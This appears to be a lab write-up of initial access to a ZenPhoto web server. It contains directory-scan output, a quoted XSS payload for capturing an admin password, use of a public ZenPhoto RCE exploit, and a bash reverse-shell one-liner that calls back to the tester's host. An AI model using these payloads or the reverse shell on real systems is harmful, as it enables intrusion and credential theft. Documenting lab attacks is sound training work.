http [Initial-access]

Looking at page.

At port 80.

It says that it is under construction.

Looking at hidden directory at port 80.

I tried to scan the port 23.

It's not allowed.

Then I tried to see the hidden directory at port 23.

I didn't find any hidden directory at port 23.

Hidden Directory searching

After hint, I started enumerating for version.

feroxbuster --url http://$zenphoto --filter-status 404 -x v1 -x v2

403      GET       10l       30w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        4l        5w       75c http://192.168.127.41/
200      GET        4l        5w       75c http://192.168.127.41/index
301      GET        9l       28w      315c http://192.168.127.41/test => http://192.168.127.41/test/
301      GET        9l       28w      323c http://192.168.127.41/test/plugins => http://192.168.127.41/test/plugins/
301      GET        9l       28w      322c http://192.168.127.41/test/themes => http://192.168.127.41/test/themes/
301      GET        9l       28w      321c http://192.168.127.41/test/cache => http://192.168.127.41/test/cache/
200      GET      101l      416w     5015c http://192.168.127.41/test/index
200      GET        0l        0w        0c http://192.168.127.41/test/themes/default/search
200      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/contact
200      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/password
200      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/search
500      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/password
200      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/register
200      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/register
200      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/contact
200      GET        0l        0w        0c http://192.168.127.41/test/themes/zenpage/password
200      GET        0l        0w        0c http://192.168.127.41/test/themes/zenpage/contact
200      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/news
500      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/news
200      GET        0l        0w        0c http://192.168.127.41/test/themes/zenpage/news
301      GET        9l       28w      348c http://192.168.127.41/test/themes/effervescence_plus/styles => http://192.168.127.41/test/themes/effervescence_plus/styles/
200      GET        0l        0w        0c http://192.168.127.41/test/themes/default/contact
200      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/gallery
200      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/pages
200      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/archive
500      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/gallery
500      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/pages
200      GET      287l      571w     5173c http://192.168.127.41/test/themes/effervescence_plus/common
500      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/archive
200      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/404
301      GET        9l       28w      337c http://192.168.127.41/test/themes/default/styles => http://192.168.127.41/test/themes/default/styles/
200      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/image
500      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/404
200      GET        0l        0w        0c http://192.168.127.41/test/themes/default/register
500      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/index
200      GET        0l        0w        0c http://192.168.127.41/test/themes/zenpage/gallery
200      GET        0l        0w        0c http://192.168.127.41/test/themes/default/password
200      GET        0l        0w        0c http://192.168.127.41/test/themes/zenpage/pages
200      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/main
500      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/image
200      GET        0l        0w        0c http://192.168.127.41/test/themes/zenpage/archive
200      GET        0l        0w        0c http://192.168.127.41/test/themes/default/archive
500      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/index
200      GET        0l        0w        0c http://192.168.127.41/test/themes/default/404
500      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/functions
200      GET     1311l     2475w    20218c http://192.168.127.41/test/themes/zenpage/style
200      GET        0l        0w        0c http://192.168.127.41/test/themes/default/image
200      GET        0l        0w        0c http://192.168.127.41/test/themes/stopdesign/gallery
200      GET        0l        0w        0c http://192.168.127.41/test/themes/default/index
200      GET        0l        0w        0c http://192.168.127.41/test/themes/zenpage/404
500      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/functions
200      GET        0l        0w        0c http://192.168.127.41/test/themes/zenpage/image
200      GET        0l        0w        0c http://192.168.127.41/test/themes/zenpage/index
200      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/search
200      GET        0l        0w        0c http://192.168.127.41/test/themes/stopdesign/404
200      GET       70l      431w    34131c http://192.168.127.41/test/themes/garland/theme
200      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/album
500      GET        4l       12w      181c http://192.168.127.41/test/themes/garland/slideshow
200      GET        0l        0w        0c http://192.168.127.41/test/themes/stopdesign/image
301      GET        9l       28w      330c http://192.168.127.41/test/themes/default => http://192.168.127.41/test/themes/default/
301      GET        9l       28w      337c http://192.168.127.41/test/themes/default/images => http://192.168.127.41/test/themes/default/images/
301      GET        9l       28w      341c http://192.168.127.41/test/themes/effervescence_plus => http://192.168.127.41/test/themes/effervescence_plus/
200      GET       42l      181w    14381c http://192.168.127.41/test/themes/default/theme
301      GET        9l       28w      348c http://192.168.127.41/test/themes/effervescence_plus/images => http://192.168.127.41/test/themes/effervescence_plus/images/
301      GET        9l       28w      349c http://192.168.127.41/test/themes/effervescence_plus/scripts => http://192.168.127.41/test/themes/effervescence_plus/scripts/
301      GET        9l       28w      337c http://192.168.127.41/test/themes/garland/images => http://192.168.127.41/test/themes/garland/images/
301      GET        9l       28w      330c http://192.168.127.41/test/themes/garland => http://192.168.127.41/test/themes/garland/
500      GET        0l        0w        0c http://192.168.127.41/test/themes/zenpage/functions
301      GET        9l       28w      322c http://192.168.127.41/test/albums => http://192.168.127.41/test/albums/
301      GET        9l       28w      333c http://192.168.127.41/test/themes/stopdesign => http://192.168.127.41/test/themes/stopdesign/
200      GET        0l        0w        0c http://192.168.127.41/test/themes/default/album
500      GET        4l       12w      181c http://192.168.127.41/test/themes/default/slideshow
200      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/album
500      GET        0l        0w        0c http://192.168.127.41/test/themes/effervescence_plus/slideshow
200      GET       61l      360w    33362c http://192.168.127.41/test/themes/zenpage/theme
200      GET        0l        0w        0c http://192.168.127.41/test/themes/zenpage/album
200      GET        1l       17w      209c http://192.168.127.41/test/themes/zenpage/footer
200      GET      176l      285w     3024c http://192.168.127.41/test/themes/zenpage/slideshow.css
301      GET        9l       28w      330c http://192.168.127.41/test/themes/zenpage => http://192.168.127.41/test/themes/zenpage/
200      GET        8l       16w      190c http://192.168.127.41/test/robots
500      GET        4l       16w      237c http://192.168.127.41/test/themes/zenpage/slideshow
200      GET        0l        0w        0c http://192.168.127.41/test/themes/stopdesign/album
500      GET        4l       12w      181c http://192.168.127.41/test/themes/stopdesign/slideshow
301      GET        9l       28w      324c http://192.168.127.41/test/uploaded => http://192.168.127.41/test/uploaded/
500      GET        0l        0w        0c http://192.168.127.41/test/themes/garland/sidebar
500      GET        7l        5w       50c http://192.168.127.41/test/themes/zenpage/sidebar
301      GET        9l       28w      323c http://192.168.127.41/test/zp-data => http://192.168.127.41/test/zp-data/
200      GET        0l        0w        0c http://192.168.127.41/test/zp-data/zp-config.php
200      GET        1l        2w     1518c http://192.168.127.41/test/favicon
301      GET        9l       28w      323c http://192.168.127.41/test/zp-core => http://192.168.127.41/test/zp-core/
200      GET        0l        0w        0c http://192.168.127.41/test/zp-core/password
301      GET        9l       28w      330c http://192.168.127.41/test/zp-core/images => http://192.168.127.41/test/zp-core/images/
200      GET        4l       16w      432c http://192.168.127.41/test/zp-core/images/bar_graph.png
200      GET        4l       17w      615c http://192.168.127.41/test/zp-core/images/folder.png
200      GET        4l       15w      874c http://192.168.127.41/test/zp-core/images/quest.png
200      GET       19l       26w      891c http://192.168.127.41/test/zp-core/images/admin-buttonback.jpg
200      GET        3l        8w      483c http://192.168.127.41/test/zp-core/images/page_white_copy.png
200      GET        7l       17w     1011c http://192.168.127.41/test/zp-core/images/edit-delete.png
200      GET        5l       11w      458c http://192.168.127.41/test/zp-core/images/pass.png
200      GET        7l       20w      997c http://192.168.127.41/test/zp-core/images/arrow_out.png
200      GET        6l       18w     1021c http://192.168.127.41/test/zp-core/images/arrow_in.png
200      GET        3l       12w      468c http://192.168.127.41/test/zp-core/images/accept.png
200      GET       14l       74w     6216c http://192.168.127.41/test/zp-core/images/icon_mail.png
200      GET       18l       82w     5937c http://192.168.127.41/test/zp-core/images/lock_open.png
200      GET        4l       14w     1207c http://192.168.127.41/test/zp-core/images/folder_picture.png
200      GET        4l       16w     1595c http://192.168.127.41/test/zp-core/images/thumb_standin.png
200      GET        8l       60w     3080c http://192.168.127.41/test/zp-core/images/zen-logo.png
200      GET        5l       14w      808c http://192.168.127.41/test/zp-core/images/envelope.png
500      GET        0l        0w        0c http://192.168.127.41/test/zp-core/rss/rss.php
500      GET        0l        0w        0c http://192.168.127.41/test/zp-core/rss/rss-comments.php
200      GET       15l       75w     5927c http://192.168.127.41/test/zp-core/images/toggleroh.png
200      GET       15l       73w     5312c http://192.168.127.41/test/zp-core/images/Zp.png
200      GET       15l       83w     6319c http://192.168.127.41/test/zp-core/images/comments-off.png
200      GET       14l       84w     5803c http://192.168.127.41/test/zp-core/images/magnify.png
200      GET       14l       72w     5003c http://192.168.127.41/test/zp-core/images/place_holder_icon.png
200      GET       10l       41w     1076c http://192.168.127.41/test/zp-core/images/comments-on.png
200      GET        5l       20w     1230c http://192.168.127.41/test/zp-core/images/pictures.png
200      GET       14l       88w     5966c http://192.168.127.41/test/zp-core/images/lock_2.png
200      GET       16l       61w     3622c http://192.168.127.41/test/zp-core/images/mask.png
200      GET        4l       12w      613c http://192.168.127.41/test/zp-core/images/arrow_up.png
200      GET        5l       11w      642c http://192.168.127.41/test/zp-core/images/warn.png
200      GET        6l       28w     1072c http://192.168.127.41/test/zp-core/images/marker.png
200      GET        4l       14w      931c http://192.168.127.41/test/zp-core/images/shape_handles.png
200      GET        6l       50w     1657c http://192.168.127.41/test/zp-core/images/view.png
200      GET       15l       78w     5962c http://192.168.127.41/test/zp-core/images/togglerc.png
200      GET        4l       20w     1203c http://192.168.127.41/test/zp-core/images/stock_copy.png
200      GET       44l       58w     1132c http://192.168.127.41/test/zp-core/images/admin-navtabback.jpg
200      GET       15l       82w     6034c http://192.168.127.41/test/zp-core/images/arrow_left_blue_round.png
200      GET        6l       14w      740c http://192.168.127.41/test/zp-core/images/searchfields_icon.png
200      GET        4l       12w     1083c http://192.168.127.41/test/zp-core/images/cache1.png
200      GET       19l       88w     6139c http://192.168.127.41/test/zp-core/images/refresh1.png
200      GET        5l       21w     1063c http://192.168.127.41/test/zp-core/images/lock.png
200      GET        6l       27w     1595c http://192.168.127.41/test/zp-core/images/select_files_button.png
200      GET       17l       88w     6186c http://192.168.127.41/test/zp-core/images/down.png
200      GET        3l       13w      957c http://192.168.127.41/test/zp-core/images/sortorder.png
200      GET       13l       60w     3867c http://192.168.127.41/test/zp-core/images/imageDefault.png
200      GET       10l       18w      877c http://192.168.127.41/test/zp-core/images/movie.jpg
200      GET        1l        2w     1518c http://192.168.127.41/test/zp-core/images/favicon.ico
200      GET        5l       27w     1706c http://192.168.127.41/test/zp-core/images/wpmini-blue.png
200      GET        3l       12w      549c http://192.168.127.41/test/zp-core/images/calendar.png
200      GET       10l       21w      634c http://192.168.127.41/test/zp-core/images/admin-headerback.jpg
200      GET        3l       12w     1111c http://192.168.127.41/test/zp-core/images/action.png
200      GET        5l       11w      279c http://192.168.127.41/test/zp-core/images/drag_handle.png
200      GET        7l       14w      444c http://192.168.127.41/test/zp-core/images/fail.png
200      GET        4l        9w      360c http://192.168.127.41/test/zp-core/images/reset.png
200      GET        3l       19w      983c http://192.168.127.41/test/zp-core/images/burst1.png
200      GET        7l       11w     1059c http://192.168.127.41/test/zp-core/images/admin-headlineback.jpg
200      GET       17l       40w     1985c http://192.168.127.41/test/zp-core/images/admin-boxback.jpg
200      GET       16l       81w     6084c http://192.168.127.41/test/zp-core/images/info_toggle.png
200      GET       16l       91w     6013c http://192.168.127.41/test/zp-core/images/folder_picture_dn.png
200      GET        7l       32w      828c http://192.168.127.41/test/zp-core/images/add.png
200      GET       17l       86w     5998c http://192.168.127.41/test/zp-core/images/pictures_dn.png
200      GET        6l       24w     1259c http://192.168.127.41/test/zp-core/images/icon_inactive.png
200      GET       17l       85w     6408c http://192.168.127.41/test/zp-core/images/edit-image.png
200      GET       15l       79w     5913c http://192.168.127.41/test/zp-core/images/togglerch.png
200      GET       15l       82w     6532c http://192.168.127.41/test/zp-core/images/reset_icon.png
200      GET       17l       85w     6136c http://192.168.127.41/test/zp-core/images/info.png
200      GET        6l       16w      846c http://192.168.127.41/test/zp-core/images/rss.png
200      GET       23l       77w     7962c http://192.168.127.41/test/zp-core/images/ajax-loader.gif
200      GET       57l      354w    20909c http://192.168.127.41/test/zp-core/images/wheel.png
200      GET       15l       76w     5964c http://192.168.127.41/test/zp-core/images/togglero.png
200      GET       19l      129w    10256c http://192.168.127.41/test/zp-core/images/err-cachewrite.png
200      GET       29l      124w    10031c http://192.168.127.41/test/zp-core/images/err-noflashplayer.png
200      GET       18l       79w     5364c http://192.168.127.41/test/zp-core/images/drag_handle_flag.png
200      GET       16l       82w     6044c http://192.168.127.41/test/zp-core/images/edit-album.png
200      GET        0l        0w        0c http://192.168.127.41/test/zp-core/archive
200      GET       74l      204w     3186c http://192.168.127.41/test/zp-core/admin
301      GET        9l       28w      327c http://192.168.127.41/test/zp-core/rss => http://192.168.127.41/test/zp-core/rss/
200      GET        3l        5w      101c http://192.168.127.41/test/zp-core/c
200      GET       19l       97w     8911c http://192.168.127.41/test/zp-core/images/err-imagegeneral.png
302      GET        0l        0w        0c http://192.168.127.41/test/zp-core/index => admin.php
200      GET        0l        0w        0c http://192.168.127.41/test/zp-core/functions
200      GET      901l     1840w    15491c http://192.168.127.41/test/themes/garland/zen
302      GET        0l        0w        0c http://192.168.127.41/test/zp-core/i => http://192.168.127.41/test/zp-core/images/err-imagenotfound.png
200      GET       75l      136w     1158c http://192.168.127.41/test/themes/effervescence_plus/slimbox
301      GET        9l       28w      333c http://192.168.127.41/test/zp-core/utilities => http://192.168.127.41/test/zp-core/utilities/
302      GET        0l        0w        0c http://192.168.127.41/test/zp-core/utilities/cache_images.php => http://192.168.127.41/test/zp-core/admin.php?from=/test/zp-core/utilities/cache_images.php
302      GET        0l        0w        0c http://192.168.127.41/test/zp-core/utilities/backup_restore.php => http://192.168.127.41/test/zp-core/admin.php?from=/test/zp-core/utilities/backup_restore.php
200      GET       15l       76w     6336c http://192.168.127.41/test/zp-core/locale/missing_flag.png
301      GET        9l       28w      330c http://192.168.127.41/test/zp-core/locale => http://192.168.127.41/test/zp-core/locale/
301      GET        9l       28w      343c http://192.168.127.41/test/themes/garland/contact_form => http://192.168.127.41/test/themes/garland/contact_form/
500      GET        0l        0w        0c http://192.168.127.41/test/zp-core/controller
301      GET        9l       28w      346c http://192.168.127.41/test/themes/stopdesign/contact_form => http://192.168.127.41/test/themes/stopdesign/contact_form/

In this, I found that there is an admin page hidden directory.

http://192.168.127.41/test/zp-core/admin

admin:admin credential didn't work here.

Trying XXS exploit

ZenPhoto Gallery 1.2.5 - Admin Password Reset (Cross-Site Request Forgery)Exploit Database

 How to use this exploit to take over a ZenPhoto website          #
#+----------------------------------------------------------------+#
#                                                                  #
# To use the XSS logger make the admin click this link:            #
#                                                                  #
#+--[code snippet - put this all in one line]--+                   #
# http://victimsite.com/zp-core/admin.php?from="><script>          #
# document.forms[0].action="[logged url]";                         #
# </script><div id="lolpwnt                                        #
#+--[ end of code snippet]--+                                      #
#                                                                  #
# Replace [logger url] with the link to this PHP script            #
# Make sure your log.txt is writable before doing this             #
# On login the admins password will be saved to the file.          #
#                                                                  #
# The next exploit is used by simply giving the link to            #
# this script to the admin. if he clicks it his password           #
# will be changed automatically to "ownedbydusec"                  #
#                                                                  #
# That's about it :) Enjoy!                                        #

First i will save this file in my kali linux.

searchsploit -m 9166

File extention is .txt , I should be .php as stated above. So, I will change it to .php extension.

mv 9166.txt 9166.php

I will start the python webserver.

python3 -m http.server 80

Now I will craft the url according to my website.

Initial url

#+--[code snippet - put this all in one line]--+                   #
# http://victimsite.com/zp-core/admin.php?from="><script>          #
# document.forms[0].action="[logged url]";                         #
# </script><div id="lolpwnt                                        #
#+--[ end of code snippet]--+

Final Url:

http://192.168.146.41/test/zp-core/admin?from="><script>document.forms[0].action="[http://192.168.45.166/9166.php]";</script><div id="lolpwnt

It ran and loaded the page.

But didn't work.

Trying RCE exploit.

When i visited belwo directory and seen source code, I found that there is version number mentioned.

http://192.168.146.41/test/

ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code ExecutionExploit Database

Using this exploit.

searchsploit -m 18083

Now I will run the exploit.

After reading the exploit, It is clear that we need to pass /test/ Directory to complete the URL.

One line from code

"POST {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";

So, My Exploit code will be as shown below:

php 18083.php $zenphoto /test/

Great!! I got the shell as www-data user.

Stabalize the shell

sudo rlwrap nc -lnvp 22

Then run the bash shell command below:

bash -c "bash -i >& /dev/tcp/192.168.45.166/22 0>&1"

Enable tty.

(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')

PreviousZenPhoto [Intermediate]NextPrivilege escalation

Last updated 1 year ago

hashtagHidden Directory searching

hashtagTrying XXS exploit

hashtagTrying RCE exploit.

Hidden Directory searching

Trying XXS exploit

Trying RCE exploit.